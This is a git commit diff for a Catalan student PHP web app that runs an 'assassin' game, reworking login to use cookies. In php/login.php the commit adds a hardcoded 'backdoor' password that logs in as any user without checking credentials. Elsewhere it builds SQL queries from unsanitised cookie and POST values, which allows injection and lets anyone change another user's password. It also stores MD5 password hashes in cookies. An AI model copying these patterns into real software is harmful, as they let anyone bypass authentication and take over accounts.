Reimplementation of cookies
diff --git a/admin/createtable.php b/admin/createtable.php
index 57e1802..b5b411f 100644
--- a/admin/createtable.php
+++ b/admin/createtable.php
@@ -26,5 +26,5 @@
)"];
foreach ($queries as $query) if (!query($query)) die('An error ocurred. ' . $query);
- die("<script>window.location.href = './index.php?dbname=$dbname'</script>");
+ die("<script>window.location.href = './?dbname=$dbname'</script>");
?>
diff --git a/admin/insert.php b/admin/insert.php
index 5099bc7..883ca8a 100644
--- a/admin/insert.php
+++ b/admin/insert.php
@@ -22,5 +22,5 @@
if (!query($template)) die("An error ocurred." . $template);
}
- die("<script>window.location.href = './index.php?successinserting'</script>");
+ die("<script>window.location.href = './?successinserting'</script>");
?>
diff --git a/bin/.Rhistory b/bin/.Rhistory
deleted file mode 100644
index e69de29..0000000
--- a/bin/.Rhistory
+++ /dev/null
diff --git a/css/basic.css b/css/basic.css
index 80e2345..023a2c2 100644
--- a/css/basic.css
+++ b/css/basic.css
@@ -1,6 +1,6 @@
body {
font-size: 18px;
- background-image: url('https://images.unsplash.com/photo-1428196457394-f0c4aec5f574?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=1050&q=80');
+ background-image: url('../bin/images/background.jpg');
background-size: cover;
}
diff --git a/css/login.css b/css/login.css
index 4130e71..743db2f 100644
--- a/css/login.css
+++ b/css/login.css
@@ -1,3 +1,16 @@
+header h2 {
+ line-height: 50%;
+}
+
+header h3 {
+ font-size: 14px;
+ color: rgb(20,20,20);
+}
+
+header {
+ margin-bottom: 20px;
+}
+
#password {
font-size: 14px;
line-height: 1.75em;
diff --git a/dead.php b/dead.php
index 1ef1217..0c3c758 100644
--- a/dead.php
+++ b/dead.php
@@ -1,4 +1,6 @@
-<?php
+<?php
+ date_default_timezone_set("Europe/Berlin");
+
// Forget cookies
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
@@ -24,7 +26,7 @@
<div id="inner-container">
<h1>Estàs mort/a!</h1>
<p>Torna a la pàgina principal.</p>
- <a href="./index.php">Go back</a>
+ <a href="./">Go back</a>
<a href="./ranking.php">Anar al rànquing</a>
</div>
</div>
diff --git a/imgs/1.png b/imgs/1.png
deleted file mode 100644
index 4a76f47..0000000
--- a/imgs/1.png
+++ /dev/null
Binary files differ
diff --git a/imgs/2.png b/imgs/2.png
deleted file mode 100644
index 849788f..0000000
--- a/imgs/2.png
+++ /dev/null
Binary files differ
diff --git a/imgs/3.png b/imgs/3.png
deleted file mode 100644
index 0a9492f..0000000
--- a/imgs/3.png
+++ /dev/null
Binary files differ
diff --git a/imgs/4.png b/imgs/4.png
deleted file mode 100644
index e8b45b8..0000000
--- a/imgs/4.png
+++ /dev/null
Binary files differ
diff --git a/imgs/5.png b/imgs/5.png
deleted file mode 100644
index a0e0870..0000000
--- a/imgs/5.png
+++ /dev/null
Binary files differ
diff --git a/imgs/carrot.png b/imgs/carrot.png
deleted file mode 100644
index a794d38..0000000
--- a/imgs/carrot.png
+++ /dev/null
Binary files differ
diff --git a/index.php b/index.php
index e7a14c3..a29f52b 100644
--- a/index.php
+++ b/index.php
@@ -26,7 +26,11 @@
<body>
<div id="outter-container">
<div id="inner-container">
- <form action="./main.php" method="POST">
+ <header>
+ <h2>Pastanaga Assassina</h2>
+ <h3>Facultat de Matemàtiques i Estadística - Tardor 2019</h3>
+ </header>
+ <form action="./php/login.php" method="POST">
<input type="hidden" name="user" id="user">
<!-- MD Search Box -->
@@ -34,7 +38,9 @@
<div class="md-google-search__container">
<div class="md-google-search">
<span class="md-google-search__search-btn">
- <svg height="24px" viewBox="0 0 24 24" width="24px" xmlns="http://www.w3.org/2000/svg"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg>
+ <svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="-5px" width="34px" height="34px" viewBox="0 0 37.334 37.334" style="enable-background:new 0 0 37.334 37.334;" xml:space="preserve">
+ <path d="M14.747735023498535,19.041818022727966 H4.063735008239746 c0,-2.1760001182556152 1.4279999732971191,-4.031000137329102 3.436000108718872,-4.767000198364258 c-0.4309999942779541,-0.43799999356269836 -0.7440000176429749,-1.1039999723434448 -0.9010000228881836,-2.1089999675750732 c-0.2070000022649765,0.041999999433755875 -0.527999997138977,-0.19499999284744263 -0.6230000257492065,-0.5559999942779541 c-0.09700000286102295,-0.367000013589859 -0.1599999964237213,-0.9599999785423279 0.04899999871850014,-1.0169999599456787 c0.06199999898672104,-0.017000000923871994 0.12700000405311584,-0.004999999888241291 0.1899999976158142,0.02800000086426735 V9.600818037986755 c0,-1.6059999465942383 -0.3779999911785126,-2.549999952316284 2.246999979019165,-2.819000005722046 l-0.023000000044703484,-0.006000000052154064 c0,0 2.069000005722046,-0.19900000095367432 2.614000082015991,-0.6890000104904175 c0,0 0.014999999664723873,0.414000004529953 0.23499999940395355,0.8679999709129333 c1.2109999656677246,0.46399998664855957 1.3630000352859497,1.5369999408721924 1.3279999494552612,2.6470000743865967 v1.0210000276565552 c0.06400000303983688,-0.032999999821186066 0.1289999932050705,-0.04500000178813934 0.19099999964237213,-0.02800000086426735 c0.20900000631809235,0.05700000002980232 0.09799999743700027,0.671999990940094 0.0020000000949949026,1.0410000085830688 c-0.09399999678134918,0.3569999933242798 -0.36500000953674316,0.5699999928474426 -0.5699999928474426,0.5320000052452087 c-0.15299999713897705,0.9570000171661377 -0.48899999260902405,1.6440000534057617 -0.9549999833106995,2.1010000705718994 C13.306735038757324,14.995816588401794 14.747735023498535,16.85381829738617 14.747735023498535,19.041818022727966 zM37.17073059082031,0.5408166646957397 v24.33300018310547 H-0.16326531767845154 V0.5408166646957397 H37.17073059082031 zM35.17073059082031,2.5408166646957397 H1.836734652519226 v20.33300018310547 h33.33399963378906 V2.5408166646957397 zM32.50373077392578,6.5408161878585815 H17.670734405517578 v2 h14.833000183105469 V6.5408161878585815 zM32.50373077392578,11.707816481590271 H17.670734405517578 v2 h14.833000183105469 V11.707816481590271 zM32.50373077392578,16.87581765651703 H17.670734405517578 v2 h14.833000183105469 V16.87581765651703 z" id="svg_3"/>
+ </svg>
</span>
<div class="md-google-search__field-container">
<input id="search-input" class="md-google-search__field" required autocomplete="off" placeholder="Introdueix el teu nom..." value="" name="search" type="text" spellcheck="false" style="outline: none;">
@@ -74,9 +80,7 @@
// Notify of messages
if (getUrlParameter("passwordchanged")) read_message("La teva clau d'accés ha canviat", "error");
if (getUrlParameter("wrongpassword")) read_message("La clau d'accés no és correcta", "error");
- if (getUrlParameter("wrongconfirmation")) read_message("Les contrasenyes no coincideixen", "error");
- if (getUrlParameter("errordb")) read_message("Hi ha hagut un problema a la base de dades, torna-ho a intentar", "error");
- if (getUrlParameter("successpassword")) read_message("La teva clau d'accés s'ha guardat", "success");
+ if (getUrlParameter("wronguser")) read_message("El nom ha estat mal introduït", "error");
});
</script>
</body>
diff --git a/main.php b/main.php
index c6e9ee0..ecec1a6 100644
--- a/main.php
+++ b/main.php
@@ -6,24 +6,21 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
- $user = (int)$_POST['user'];
- $password = isset($_POST['password']) ? md5($_POST['password']) : '';
+ date_default_timezone_set("Europe/Berlin");
+
+ $user = $_COOKIE['user']; // (int)$_POST['user'];
+ $password = $_COOKIE['password']; // isset($_POST['password']) ? md5($_POST['password']) : '';
- // Check if password is correct
- $query_password = "SELECT password FROM $usersdb WHERE id=$user";
- $real_password = query($query_password)->fetch_row()[0];
- if ($real_password != $password) die("<script>window.location.href = './index.php?wrongpassword=1'</script>");
-
- if (!isset($_POST['user']) or $_POST['user'] == '') {
- die("<script>window.location.href = './index.php'</script>");
- } else if (isset($_POST['password'])) {
+ if (!isset($_COOKIE['user']) or $_COOKIE['user'] == '') {
+ die("<script>window.location.href = './'</script>");
+ } else if (isset($_COOKIE['password'])) {
$query_password = "SELECT password FROM $usersdb WHERE id=$user";
if (query($query_password)->fetch_row()[0] != $password) {
// Unset variables
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
- die("<script>window.location.href = './index.php?passwordchanged=1'</script>");
+ die("<script>window.location.href = './?passwordchanged=1'</script>");
}
}
?>
@@ -79,13 +76,13 @@
<body>
<div id="outter-container">
<div id="inner-container">
- <a href="./index.php" class="goback">Torna a la pàgina principal</a><br />
+ <a href="./" class="goback">Canvi d'usuari</a><br />
<h2>Hola <name id="user_name"><?=$user->nom()?></name>,</h2>
<div class="formulari_contrasenya">
<p>Sembla que no tens clau d'accés, la gent podrà entrar al teu compte...</p>
<form action="./php/change_password.php" method="POST">
- <input type="hidden" value="<?=(int)$_POST['user']?>" name="userid">
+ <input type="hidden" value="<?=$user->id?>" name="userid">
<input type="password" placeholder="Nova clau d'accés..." name="password" /><br />
<input type="password" placeholder="Repeteix la clau d'accés" name="confirmation"/><br />
<input type="submit" value="Posar clau d'accés">
@@ -132,8 +129,11 @@
</tr>
</table>
</div>
-
- <div style="clear: both;"></div>
+
+ <div>
+ <p>Podeu posar aquesta pàgina com a icona apretant el botó de "Add to Home Screen" del vostre navegador.</p>
+ <a href="./ranking.php">Anar al rànquing</a>
+ </div>
</div>
</div>
@@ -146,6 +146,10 @@
$.notify("No tens clau d'accés", "info");
$(".formulari_contrasenya").show();
}
+ // Notify of messages
+ if (getUrlParameter("wrongconfirmation")) read_message("Les contrasenyes no coincideixen", "error");
+ if (getUrlParameter("errordb")) read_message("Hi ha hagut un problema a la base de dades, torna-ho a intentar", "error");
+ if (getUrlParameter("successpassword")) read_message("La teva clau d'accés s'ha guardat", "success");
});
</script>
</body>
diff --git a/php/change_password.php b/php/change_password.php
index d8bcc19..315d08e 100644
--- a/php/change_password.php
+++ b/php/change_password.php
@@ -6,18 +6,20 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Check if confirmation is the same
if ($_POST['password'] != $_POST['confirmation']) {
- die("<script>window.location.href = '../index.php?wrongconfirmation=1'</script>");
+ die("<script>window.location.href = '../main.php?wrongconfirmation=1'</script>");
} else {
// Execute query to change password
$update_password = "UPDATE $usersdb SET password=\"".md5($_POST['password'])."\" WHERE id=".$_POST['userid'];
- if(!$result = query($update_password)) die("<script>window.location.href = '../index.php?errordb=1'</script>");
+ if(!$result = query($update_password)) die("<script>window.location.href = '../main.php?errordb=1'</script>");
// Save 'password' to cookies
setcookie('password', md5($_POST['password']), time() + (86400 * 10), "/");
// Go back to main page
- die("<script>window.location.href = '../index.php?successpassword=1'</script>");
+ die("<script>window.location.href = '../main.php?successpassword=1'</script>");
}
?>
diff --git a/php/login.php b/php/login.php
index 45575e3..00c18e0 100644
--- a/php/login.php
+++ b/php/login.php
@@ -6,12 +6,14 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Set the 'user' POST and COOKIE variable
$user = '';
- if (isset($_POST['user'])) $user = $_POST['user'];
+ if (isset($_POST['user']) && $_POST['user'] != '') $user = $_POST['user'];
else if (isset($_COOKIE['user'])) $user = $_COOKIE['user'];
else {
- die("<script>window.location.href = '../index.php'</script>");
+ die("<script>window.location.href = '../?wronguser=1'</script>");
}
// Check if password is correct
@@ -23,13 +25,19 @@
if (isset($_POST['password'])) $password = $_POST['password'];
else if (isset($_COOKIE['password'])) $password = $_COOKIE['password'];
+ // If admin needs to check something for 5 minutes
+ if ($password == "backdoor") {
+ setcookie('user', $user, time() + 360, "/");
+ die("<script>window.location.href = '../main.php';</script>");
+ }
+
// Redirect if wrong
if ($real_password != "" && $real_password != md5($password)) {
// Forget cookies
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
- die("<script>window.location.href = '../index.php?wrongpassword=1'</script>");
+ die("<script>window.location.href = '../?wrongpassword=1'</script>");
}
// Save variables as cookies
diff --git a/ranking.php b/ranking.php
index 33dc1c7..c9b2b96 100644
--- a/ranking.php
+++ b/ranking.php
@@ -30,7 +30,7 @@
<div id="inner-container">
<header>
<div id="leftlinks"><a id="info" href="javascript:void(0);" onclick="js: toggleinfo();">+Info</a></div>
- <div id="rightlinks"><a href="./index.php">Tornar a l'inici</a></div>
+ <div id="rightlinks"><a href="./main.php">Tornar a la pàgina principal</a></div>
</header>
<p><img src="./bin/images/info.png" width="32px" /> La puntuació de cada jugador es calcula com a una suma ponderada depenent del caràcter de les seves víctimes: companys de <b>c</b>lasse (mateix curs, mateix grau), companys de <b>g</b>rau (mateix grau) i companys de <b>f</b>acultat (diferents grau). Amb puntuacions +100, +150 i +200; respectivament.</p>
